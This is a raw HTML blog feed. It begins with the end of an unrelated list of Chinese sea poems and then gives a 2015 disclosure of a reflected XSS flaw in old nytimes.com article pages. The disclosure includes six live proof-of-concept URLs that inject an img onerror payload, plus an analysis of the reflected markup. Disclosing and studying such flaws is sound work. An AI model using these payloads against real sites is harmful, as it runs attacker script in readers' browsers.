<br />
<br />
6,东临碣石,以观沧海。水何澹澹,山岛竦峙。——曹操《观沧海》<br />
7,浮天沧海远,去世法舟轻。——钱起《送僧归日本》<br />
8,俯首无齐鲁,东瞻海似杯。——李梦阳《泰山》<br />
9,海内存知己,天涯若比邻。——王勃《送杜少府之任蜀州》<br />
10,海日生残夜,江春入旧年。——王湾《次北固山下》<br />
<br />
<br />
11,海上升明月,天涯共此时。——张九龄《望月怀古》<br />
12,海水无风时,波涛安悠悠。——白居易《题海图屏风》<br />
13,瀚海阑干百丈冰,愁云惨淡万里凝。——岑参《白雪歌送武判官归京》<br />
14,君不见黄河之水天上来,奔流到海不复回。——李白《将进酒》<br />
15,君不见走马川行雪海边,平沙莽莽黄入天。——岑参《走马川行奉送封大夫出师西征》<br />
<br />
<br />
16,口衔山石细,心望海波平。——韩愈《精卫填海》<br />
17,楼观沧海日,门对浙江潮。——宋之问《灵隐寺 》<br />
18,茫茫东海波连天,天边大月光团圆。——黄遵宪《八月十五日夜太平洋舟中望月作歌》<br />
19,三万里河东入海,五千仞岳上摩天。——陆游《秋夜将晓出篱门迎凉有感》<br />
20,山水绕城春作涨,江涛入海夜通潮。——陈子澜《恩波桥诗》<br />
<br />
<br />
21,小舟从此逝,江海寄余生。——苏轼《临江仙》<br />
22,一雨纵横亘二洲,浪淘天地入东流。却余人物淘难尽,又挟风雷作远游。——梁启超《太平洋遇雨》<br />
23,月下飞天镜,云生结海楼。——李白《渡荆门送别》<br />
24,曾经沧海难为水,除却巫山不是云。——元稹《离思》<br />
25,煮海之民何所营,妇无蚕织夫无耕。衣食之源太寥落,牢盆煮就汝轮征。柳永《煮海歌》<br />
<br />
<br />
<br />
<br />
Reposted from Tetraph:<br /> <a data-mce-href="http://www.tetraph.com/blog/articles/sea/" href="http://www.tetraph.com/blog/articles/sea/">http://www.tetraph.com/blog/articles/sea/</a><br />
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-32069479013500640392015-06-20T02:18:00.000-07:002015-06-20T02:18:25.610-07:00New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Old New York Times Articles Can Be Exploited by XSS Attacks (Almost All Article Pages Before 2013 Are Affected)</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"The New York Times (NYT) is an American daily newspaper, founded and continuously published in New York City since September 18, 1851, by the New York Times Company. It has won 114 Pulitzer Prizes, more than any other news organization. The paper's print version has the largest circulation of any metropolitan newspaper in the United States, and the second-largest circulation overall, behind The Wall Street Journal. It is ranked 39th in the world by circulation. Following industry trends, its weekday circulation has fallen to fewer than one million daily since 1990. Nicknamed for years as "The Gray Lady", The New York Times is long regarded within the industry as a national "newspaper of record". It is owned by The New York Times Company. Arthur Ochs Sulzberger, Jr., (whose family (Ochs-Sulzberger) has controlled the paper for five generations, since 1896), is both the paper's publisher and the company's chairman. Its international version, formerly the International Herald Tribune, is now called the International New York Times. The paper's motto, "All the News That's Fit to Print", appears in the upper left-hand corner of the front page." (Wikipedia)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) Vulnerability Description:</span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">The New York Times website has a reflected cross-site scripting (XSS) problem. An attacker can use these XSS bugs against its readers: a crafted nytimes.com link runs attacker-chosen script in the reader's browser, in the context of nytimes.com.</span></span></div>
<div style="margin: 0px;">
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span><span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The flaw is in how article pages are built from the request URL. Nytimes (short for New York Times) copies part of the requested URL path into the page, specifically into the href of the page-navigation links. For pages generated before 2013 it appears that this content was written into HTML attributes without any filtering or encoding, so anything appended to the article path is reflected verbatim.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Because of this design, almost all URLs from before 2013 are affected (every article page). In fact, every article page that carries a "PRINT", "SINGLE PAGE", "Page *" or "NEXT PAGE" button is affected, since each of those buttons is a link whose href is built from the request path.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Nytimes changed this mechanism in 2013. It now decodes the URLs sent to its server before using them, which makes the mechanism much safer.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">However, article pages from before 2013 still use the old mechanism, so almost all of them remain vulnerable to XSS attacks. I guess the reason Nytimes did not filter the older URLs is cost: it costs too much (money &amp; human capital) to change the database of all the articles posted before then.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZ5raGQcCQQhamqSXm4VSEZsPJ-3bBUy6fYOuMFhF_7PeWJIslvFFmQuwdfnOqBo98zl73r003ZARZdYaFra0cyjaeawJAm8xIrzmNPjTUtxqew6SPly44YnynXR2qy5_2JChEx6hH0Q/s1600/nytimes_2010_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsZ5raGQcCQQhamqSXm4VSEZsPJ-3bBUy6fYOuMFhF_7PeWJIslvFFmQuwdfnOqBo98zl73r003ZARZdYaFra0cyjaeawJAm8xIrzmNPjTUtxqew6SPly44YnynXR2qy5_2JChEx6hH0Q/s1600/nytimes_2010_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5yyFnnkqbkYcLLlrx7nR_IusGpmGHwr0xY_pzNYHdKnz3H1xp83w8X1TJa8L2ElsV7Sq2H6X-_ET9ZrY71JYzKXAv5XRqzAPdFHqLt0abr6QHfSlmZ8uZjYQe_FLVRlaUmE0pOO5IHzQ/s1600/nytimes_2011_xss.png" style="margin-left: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5yyFnnkqbkYcLLlrx7nR_IusGpmGHwr0xY_pzNYHdKnz3H1xp83w8X1TJa8L2ElsV7Sq2H6X-_ET9ZrY71JYzKXAv5XRqzAPdFHqLt0abr6QHfSlmZ8uZjYQe_FLVRlaUmE0pOO5IHzQ/s1600/nytimes_2011_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Live PoC URLs:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></a></div>
<div style="margin: 0px;">
<a href="http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E?pagewanted=all&amp;_r=0"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2011/01/09/travel/09where-to-go.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;?pagewanted=all&amp;_r=0</span></a></div>
<div style="margin: 0px;">
<a href="http://www.nytimes.com/2010/12/07/opinion/07brooks.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2010/12/07/opinion/07brooks.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></a></div>
<div style="margin: 0px;">
<a href="http://www.nytimes.com/2009/08/06/technology/06stats.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2009/08/06/technology/06stats.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></a></div>
<div style="margin: 0px;">
<a href="http://www.nytimes.com/2008/07/09/dining/091crex.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2008/07/09/dining/091crex.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></a></div>
<div style="margin: 0px;">
<a href="http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//%27%20%22%3E%3Cimg%20src=x%20onerror=prompt%28/justqdjing/%29%3E"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html//' "&gt;&lt;img src=x onerror=prompt(/justqdjing/)&gt;</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>POC Video:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=RekCK5tjXWQ">https://www.youtube.com/watch?v=RekCK5tjXWQ</a></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<div style="margin: 0px;">
<a href="http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blogspot.com/2014/10/new-york-times-nytimescom-page-design.html</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Analysis:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Take the following link as an example,</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a data-mce-href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" href="http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/" target="_blank">http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/</a>"&gt;&lt;vulnerabletoattack</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The reflected page then contains the following markup, and every one of these links is vulnerable: the injected path lands inside each href attribute, the <code>"&gt;</code> in the probe closes the attribute and the tag, and whatever follows (here the harmless tag name <code>vulnerabletoattack</code>, in the PoC URLs an <code>img</code> with an <code>onerror</code> handler) is parsed as new HTML.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”print”></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>vulnerabletoattack?pagewanted=<wbr></wbr>print”>Print</testtesttest?<wbr></wbr>pagewanted=print”></a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li class=”singlePage”></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href=”/2012/02/12/sunday-<wbr></wbr>review/big-datas-impact-in-<wbr></wbr>the-world.html/”><<wbr></wbr>testtesttest?pagewanted=all”> Single Page</vulnerabletoattack?<wbr></wbr>pagewanted=all”></a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> </li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick="s_code_linktrack('Article-MultiPagePageNum2');" title="Page 2" href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=2">2</testtesttest?pagewanted=2"></a> </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><li> <a onclick="s_code_linktrack('Article-MultiPagePageNum3');" title="Page 3" href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=3">3</testtesttest?pagewanted=3"></a> </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"></li></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a class="next" onclick="s_code_linktrack('Article-MultiPage-Next');" title="Next Page" href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=2">Next Page »</testtesttest?pagewanted=2"></a></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(3) What is XSS?</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy.</span></div>
<div style="margin: 0px;">
<span style="background-color: white; line-height: 19.6000003814697px; text-align: justify;"><span style="font-family: Arial, Helvetica, sans-serif;">"Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records. Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques. Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet." (Acunetix)</span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerability can be exploited without the user being logged in. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 8.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discoverer and Reporter:</span></div>
</div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (<a href="https://twitter.com/justqdjing/status/558912434010730497">@justqdjing</a>)</span></div>
</div>
<div style="background-color: white; line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px;">
<span style="-webkit-transition: color 0.3s; outline: none; transition: color 0.3s;"><a href="http://www.tetraph.com/wangjing" style="-webkit-transition: color 0.3s; display: inline; outline: none; text-decoration: none; transition: color 0.3s;" target="_blank"><span style="font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/wangjing</span></a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b></div>
</div>
